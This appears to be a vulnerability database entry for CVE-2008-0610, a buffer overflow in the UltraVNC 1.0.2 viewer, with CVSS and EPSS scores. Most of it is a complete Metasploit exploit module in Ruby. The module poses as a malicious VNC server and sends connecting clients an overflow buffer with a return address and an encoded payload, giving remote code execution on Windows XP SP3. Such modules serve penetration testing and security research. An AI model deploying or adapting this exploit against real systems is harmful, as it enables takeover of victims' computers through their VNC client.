UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow

2012-03-2820:29:31

noperand

www.rapid7.com

CVSS2

9.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS

0.318

Percentile

97.1%

JSON

This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.

        If a malicious server responds to a client connection indicating a minor
        protocol version of 14 or 16, a 32-bit integer is subsequently read from
        the TCP stream by the client and directly provided as the trusted size for
        further reading from the TCP stream into a 1024-byte character array on
        the stack.
      },
      'Author'         => 'noperand',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-0610' ],
          [ 'OSVDB', '42840' ],
          [ 'BID', '27561' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3',	{ 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2008-02-06',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ])
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    sploit = rand_text_alpha(1100)   	# junk, could be more efficient here
    sploit << "\x00\x04\x00\x00" 	 	# value to get around a write
    sploit << rand_text_alpha(12)	 	# random junk
    sploit << "\xEB\x06" << make_nops(2)	# short relative jump
    sploit << [target.ret].pack('V') 	# pop/pop/ret (default is in vncviewer.exe)
    sploit << payload.encoded

=begin
    We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016").
    - These bytes are read directly by a call to ReadExact() with a size of 12.

    ...
    if (m_minorVersion == 14 || m_minorVersion == 16)
    {
      int size;
      ReadExact((char *)&size,sizeof(int));
      char mytext[1024]; //10k
      ReadExact(mytext,size);
      mytext[size]=0;
    ...

    If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read.
    We then append our data.
=end
    sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)
    handler(client)
    service.close_client(client)
  end
end